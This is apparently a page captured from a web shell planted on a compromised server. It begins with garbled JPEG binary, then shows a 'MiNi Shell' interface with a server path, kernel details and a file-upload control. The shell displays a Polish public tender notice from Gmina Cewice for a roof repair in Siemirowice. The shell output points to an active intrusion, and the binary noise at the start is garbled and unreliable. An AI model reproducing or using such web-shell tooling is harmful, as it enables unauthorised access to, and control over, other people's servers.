JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210913/0017840601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu budynku nr 2 w Siemirowicach gm. Cewice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Cewice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">W. Witosa 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 861-34-60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 861-34-62</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cewice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cewice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> kierowanie podstawowymi rodzajami działalności publicznej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu budynku nr 2 w Siemirowicach gm. Cewice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6bf09fe3-147a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00178406</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000340/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Remont dachu budynku nr 2 w Siemirowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cewice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cewice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korespondencja prowadzona jest za pomocą Platformy Zakupowej dostępnej pod adresem wskazanym<br/>poniżej. 4.1. zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na<br/>subdomenie Gminy Cewice;https://cewice.ezamawiajacy.pl,<br/>lubhttps://oneplace.marketplanet.pl.4.2.Wykonawca po wybraniu opcji„Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego;podaje adres e-mail, ustanawia hasło,następnie powtarza hasło, wpisuje<br/>kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.4.3. Rejestracja Wykonawcy<br/>trwamaksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty.Wykonawca wraz z<br/>potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia<br/>procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww.<br/>potwierdzeniu. 4.4. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki„Korespondencja”.5. Wykonawca może zwrócić się do Zamawiającego z<br/>wnioskiem o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej<br/>przez opcję„Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. Zamawiający informuje, iż<br/>wprzypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy<br/>Cewice tel. +48 22 257 22 23(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl8. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej tj.:8.1. Stały dostęp do sieci Internetogwarantowanejprzepustowości nie mniejszej niż 512 kb/s;8.2. Komputer klasy PC lub MAC, o<br/>następującej<br/>konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;8.3. Zainstalowanadowolna przeglądarka<br/>internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0;8.4. Włączona obsługa JavaScript;8.5. Zainstalowany program Acrobat Reader<br/>lub inny obsługujący pliki w formacie .pdf.9. Zamawiający określa dopuszczalneformaty przesyłanych<br/>danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx,<br/>pptx,csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip,<br/>tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC,<br/>XMLenc.10. Zamawiający określa informacje na temat kodowania i czasuodbioru danych tj.:10.1. Plik<br/>załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako<br/>zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zamawiający udostępnia dane osobowe, o których mowa<br/>w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX Pzp, do upływu terminu na ich wniesienie.2. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w<br/>art.16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o<br/>udzieleniezamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą.3. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.<br/>1 rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończeniatego<br/>postępowania.4. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art.<br/>18ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że<br/>zachodząprzesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. 5. Ograniczenia<br/>zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się odpowiednio. 6. W<br/>przypadku korzystania przez osobę,której dane osobowe są przetwarzane przez zamawiającego, z<br/>uprawnienia, o którym mowa w art. 15ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od<br/>osobywystępującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia. 7. Skorzystanie przez osobę,<br/>której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, októrym mowa wart. 16 rozporządzenia 2016/679, nie może naruszać integralności<br/>protokołu postępowania oraz jego załączników.8. W postępowaniu są przetwarzane dane osobowe<br/>podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz.U.z2019 r. poz. 1781)oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w<br/>szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego<br/>pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca<br/>przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku podstaw do<br/>wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania<br/>przedmiotu zamówienia.9. W postępowaniu i po zakończeniu postępowania do przetwarzania<br/>danychosobowych osób fizycznychstosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie<br/>danychosobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.10. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia 2016/679, zamawiający informuje, że: 1) administratorem danych osobowych<br/>osóbfizycznych jest Zamawiający -Gmina Cewice ul. W. Witosa 16, 84-312 Cewice, tel.: 59 861-34-60;fax:59 861-34-62, email: sekretariat@cewice.pl, 2) Zamawiający wyznaczył Inspektora Ochrony<br/>Danych, z<br/>którym można się skontaktować Pani Monika Zygmunt-Jakuć, kontakt: iod@cewice.pl, tel.: 791-711-<br/>174,3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>rozporządzenia 2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>oznaczenie sprawy: ZP-ZIR.271.34.2021prowadzonym przez Zamawiającego – Gminę Cewice,4) w odniesieniu do<br/>danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 rozporządzenia2016/679</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Skorzystanie przez osobę, której dane osobowe<br/>dotyczą,z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia2016/679,nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2.Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.3.W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18<br/>ust. 1 rozporządzenia 2016/679,spowoduje ograniczenie przetwarzania danych osobowych zawartych<br/>w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania<br/>oudzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust.2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-ZIR.271.34.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 277494,55 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 265299,43 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na remoncie dachu budynku<br/>mieszkalnego wielorodzinnego w zakresie wymiany istniejącego pokrycia dachowego o pow.<br/>min. 431 m2 wraz z obróbkami blacharskimi i remontem kominów. Parter budynku zajmuje<br/>Przedszkole funkcjonujące w ramach Zespołu Szkolno-Przedszkolnego w Siemirowicach. Część<br/>mieszkalna zajmuje 51,61% budynku, część niemieszkalna 48,39%. Wykonawca powinienzastosować odpowiednią stawkę podatku VAT, zgodnie z przepisami ustawy z dnia 11 marca<br/>2004 r. o podatku od towarów i usług (Dz.U.2021.685).<br/>Zakres robót<br/>1. Roboty rozbiórkowe:<br/>a) Rozebranie wszystkich obróbek blacharskich oraz pokrycia z blachy płaskiej.<br/>b) Demontaż warstw izolacji przeciwwilgociowych z papy.<br/>c) Rozebranie czapek betonowych oraz część wszystkich kominów wystających ponad dach.<br/>2. Naprawa kominów:<br/>a) Wymurowanie kominów ponad dach z cegły ceramicznej licowanej.<br/>b) Wykonanie obróbek blacharskich wokół kominów z blachy powlekanej.<br/>3. Wymiana uszkodzonych, zagrzybiałych elementów konstrukcyjnych dachu (krokwie,<br/>kleszcze).<br/>4. Wymiana uszkodzonych, zagrzybiałych elementów deskowania.<br/>5. Impregnacja elementów drewnianych poprzez smarowanie impregnatem grzybobójczym.<br/>6. Prace dekarskie:<br/>a) Wykonanie wstępnego krycia z membrany dachowej (membrana dostosowana do układania<br/>na deskowaniu).<br/>b) Ołacenie połaci dachowej łatami o przekroju 40x60 mm z wykonaniem<br/>i osadzeniem wyłazów dachowych.<br/>c) Wykonanie nowego pokrycia z blachy powlekanej trapezowej.<br/>d) Montaż nowych rynien i rur spustowych z blachy powlekanej.<br/>e) Montaż wyłazów dachowych.<br/>7. Prace pomocnicze – rusztowania:<br/>a) Montaż rusztowań ramowe przyścienne.<br/>8. Wywóz i utylizacja odpadów:<br/>a) Wywóz gruzu samochodami samowyładowczymi.<br/>Wykonawca zobowiązany jest do:<br/>1. Odpowiedniego zabezpieczenia terenu budowy.<br/>2. Zapewnienia bezpieczeństwa organizacji robót na terenie budowy, w okresie trwania Umowy<br/>aż do zakończenia i odbioru końcowego robót. Sam teren prowadzenia prac powinien być<br/>zabezpieczony przed dostępem osób trzecich.<br/>3. W przypadku demontażu istniejącej konstrukcji dachowej oraz niemożliwości prowadzenia<br/>dalszych robót budowlanych z powodu niesprzyjających warunków atmosferycznych należy w<br/>sposób odpowiedni i należyty zabezpieczyć budynek przed negatywnym skutkiem warunków<br/>atmosferycznych (opady atmosferyczne, porywy wiatru itd.).<br/>4. Materiały pochodzące z rozbiórki, stanowią własność Wykonawcy i powinny być usunięte z<br/>terenu budowy na składowisko Wykonawcy albo na wysypisko odpadów przy zastosowaniu<br/>przepisów ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779). Koszt<br/>związany z rozbiórką, transportem, składowaniem (utylizacją) materiałów rozbiórkowych ponosi<br/>Wykonawca, nie podlega on osobnej zapłacie.<br/>5. W przypadku uszkodzenia istniejącego uzbrojenia terenu lub urządzeń budowlanych<br/>Wykonawca zobowiązany jest do naprawienia szkody i poniesienia wszelkich kosztów z tym<br/>związanych.<br/>6. Uporządkowania terenu budowy.<br/>Szczegółowy opis przedmiotu zamówienia stanowią załączniki:<br/>1. Dokumentacja projektowa.<br/>2. Przedmiar robót.W przypadku wątpliwości interpretacyjnych co do zakresu robót obowiązuje następująca<br/>kolejność n/w dokumentów:<br/>1. dokumentacja projektowa<br/>3. przedmiar robót<br/>Informacje dotyczące przeprowadzenia wizji lokalnej w terenie<br/>Zamawiający nie wymaga przeprowadzenia wizji lokalnej w terenie ani zapoznania się z<br/>dokumentacją projektową w siedzibie Zamawiającego.<br/>Informacje pozostałe<br/>1. W przypadku rozbieżności pomiędzy dokumentacją projektową, a przedmiarem w pierwszej<br/>kolejności rozpatrywać należy zapisy dokumentacji projektowej, a następnie przedmiaru robót.<br/>2. Wykonawca, który powołuje się na rozwiązanie równoważne opisywanym przez<br/>Zamawiającego, jest obowiązany wykazać na etapie składania oferty, że oferowane przez niego<br/>roboty, materiały, itp. spełniają wymagania określone przez Zamawiającego w odniesieniu do<br/>przedmiotu zamówienia. Zamawiający oceniając równoważność będzie kierował się takimi<br/>elementami, jak funkcjonalność i wytrzymałość, które w zaproponowanych rozwiązaniach<br/>równoważnych nie powinny być mniejsze od opisanych w dokumentach postępowania dla<br/>danego rozwiązania, materiału, czy funkcji. Dokumenty mające na celu wykazanie<br/>równoważności stanowią element oferty opisujący oferowany przedmiot, a zatem nie podlegają<br/>uzupełnieniu. Opis zaproponowanych rozwiązań równoważnych powinien być na tyle<br/>szczegółowy, żeby Zamawiający przy ocenie ofert mógł ocenić spełnienie wymagań<br/>dotyczących ich parametrów technicznych oraz rozstrzygnąć, czy zaproponowane rozwiązania<br/>są równoważne.<br/>3. Zamawiający wymaga aby Wykonawca udzielił na wykonany przedmiot zamówienia co<br/>najmniej 36 miesięcy rękojmi za wady i 36 miesięcy gwarancji jakościowej. Zrównuje się oba<br/>okresy. Jednocześnie wydłużenie tych okresów jest możliwe. W takim przypadku<br/>zadeklarowanie dłuższego okresu będzie powodować odpowiednią punktację w kryteriach oceny<br/>ofert<br/>4. Zmawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych zadań<br/>dotyczących robót budowlanych objętych przedmiotem zamówienia.<br/>5. Katalogi elektroniczne – Zamawiający nie wymaga złożenia oferty w postaci katalogów<br/>elektronicznych<br/>6. Ponadto Zamawiający wymaga, aby opierzenia, obróbki blacharskie, rynny oraz rury<br/>spustowe wykonane zostały w sposób umożliwiający korzystanie z obiektu przez osoby<br/>niepełnosprawne i osoby z ograniczeniami poruszania się oraz nie spowodowały ograniczeń dla<br/>osób niepełnosprawnych.<br/>Wymagania związane z zatrudnieniem na podstawie stosunku pracy<br/>a) Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie<br/>umowy o pracę w rozumieniu aktualnych przepisów Kodeksu Pracy osób wykonujących<br/>czynności w zakresie realizacji zamówienia:<br/>b) Roboty dekarskie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261210-9 - Wykonywanie pokryć dachowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261910-6 - Naprawa dachów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te<br/>oferty,któreniezostałyodrzucone2. maksymalna liczba punktów, jaką może uzyskać oferta wynosi<br/>100,00.Zamawiający wyliczając liczbę punktów dokona obliczeń z dokładnością do dwóch miejsc po<br/>przecinku.3. Początek okresu gwarancji i rękojmi za wady liczony jest od dnia bezusterkowego<br/>odbiorukońcowego.4. Minimalny okres gwarancji i rękojmi za wady wynosi 36 miesięcy, amaksymalny<br/>60 miesięcy. 5. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi za wady powyżej wartości<br/>maksymalnej, wówczas:a) do wyliczenia punktacji w tych kryteriach będzie przyjmowanawartość 60<br/>miesięcy,b) do umowy zostanie wpisany zadeklarowany w ofercie okres gwarancji i rękojmi za<br/>wady6.Jeżeli Wykonawca w swej ofercie nie określi okresu gwarancji i rękojmi za wady, albo też<br/>zaproponuje okres krótszy niż określone powyżej terminy minimalne, będzie to uznane za<br/>niezgodnośćoferty z warunkami zamówienia i oferta taka podlegać będzie odrzuceniu, na podstawie<br/>art. 226 ust 1 pkt 5ustawy7.Zamawiający udzieli niniejszego zamówienia Wykonawcy, którego oferta<br/>uzyska najwyższą sumę punktów zdobytych w kryterium cena i deklarowany okres gwarancji i rękojmi<br/>zawady, zgodnie ze wzorem:SP = K1 + K2Gdzie symbol SP – suma liczby punktów w poszczególnych<br/>kryteriach cenyofertK1 – liczba punktów w kryterium „cena"K2 – liczba punktów w kryterium<br/>„deklarowany okres gwarancji i rękojmi za 